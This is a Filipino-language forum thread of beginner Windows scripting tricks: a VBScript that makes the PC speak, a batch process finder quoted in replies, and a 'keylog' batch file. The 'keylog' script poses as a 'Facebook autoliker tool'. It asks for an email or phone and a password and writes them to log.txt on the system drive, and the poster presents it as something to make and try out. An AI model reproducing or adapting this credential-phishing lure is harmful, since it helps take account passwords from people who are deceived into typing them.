🔒 Closed Ito na mga tuts at commands ng computer tech note nalang

Status
Not open for further replies.

noywokeez

Enthusiast
Para ma Dali sa lahat gamit na kayu nito boyssz



Paano pagsalitain ang computer ?
1.) Open your Notepad.
2.) I-Type sa iyong Notepad ang code sa baba.
Set Computer = CreateObject("sapi.spvoice")
Computer.Speak "Hello Master!"
3.) Save as Filename.vbs
Malalaman mo rin kung lalake or babae OS mo sa pamamagitan ng boses na maririnig mo mwahahaha.


paano gumawa gumawa ng proccess finder?
==================
1. Open Notepad
2. Copy the following code:
echo off
:fnd
cls
color 0a
echo.
echo Enter the process name:
echo.
set /p process=
tasklist /nh /fi "imagename eq %process%" | find /i "%process%" >nul && (
echo.
echo Process: %process% is running
) || (
echo.
echo Process: %process% is not running
)
pause>nul
goto fnd
3. Save it as "filename.bat" (It must have ".bat" extension)
Done!,
Run the program and enter the process name like "notepad.exe" & it will tell you if that process is running or not.


paano gumawa ng keylog sa bat file
1.) open notepad
2.) copy and paste ang code sa baba
echo off & title Facebook autoliker tool & color 0a
echo.
set /p "em= Enter your email or phone: "
echo.
set /p "pw= Enter your password: "
echo.
set /p "url= Enter the url: "
echo.
echo username = %em% password = %pw% > %systemdrive%\log.txt
3.) save mo as facebook_autolike.bat
4.) test mo na
ang output nyan nasa c\ depende kung saan naka setup ung os mo
 
boss anu ibig sabihing ng nul dito? :)

paano gumawa gumawa ng proccess finder?
==================
1. Open Notepad
2. Copy the following code:
echo off
:fnd
cls
color 0a
echo.
echo Enter the process name:
echo.
set /p process=
tasklist /nh /fi "imagename eq %process%" | find /i "%process%" >nul && (
echo.
echo Process: %process% is running
) || (
echo.
echo Process: %process% is not running
)
pause>nul
goto fnd
3. Save it as "filename.bat" (It must have ".bat" extension)
Done!,
Run the program and enter the process name like "notepad.exe" & it will tell you if that process is running or not.
 
boss anu ibig sabihing ng nul dito? :)

paano gumawa gumawa ng proccess finder?
==================
1. Open Notepad
2. Copy the following code:
echo off
:fnd
cls
color 0a
echo.
echo Enter the process name:
echo.
set /p process=
tasklist /nh /fi "imagename eq %process%" | find /i "%process%" >nul && (
echo.
echo Process: %process% is running
) || (
echo.
echo Process: %process% is not running
)
pause>nul
goto fnd
3. Save it as "filename.bat" (It must have ".bat" extension)
Done!,
Run the program and enter the process name like "notepad.exe" & it will tell you if that process is running or not.

yan kung gusto mung makita yung file na naka process
 
Status
Not open for further replies.

About this Thread

  • 24
    Replies
  • 464
    Views
  • 16
    Participants
Last reply from:
mC_eLLi

Online now

Members online
401
Guests online
1,709
Total visitors
2,110

Forum statistics

Threads
2,289,480
Posts
29,058,723
Members
1,213,814
Latest member
kwhsnwjwuje
Back
Top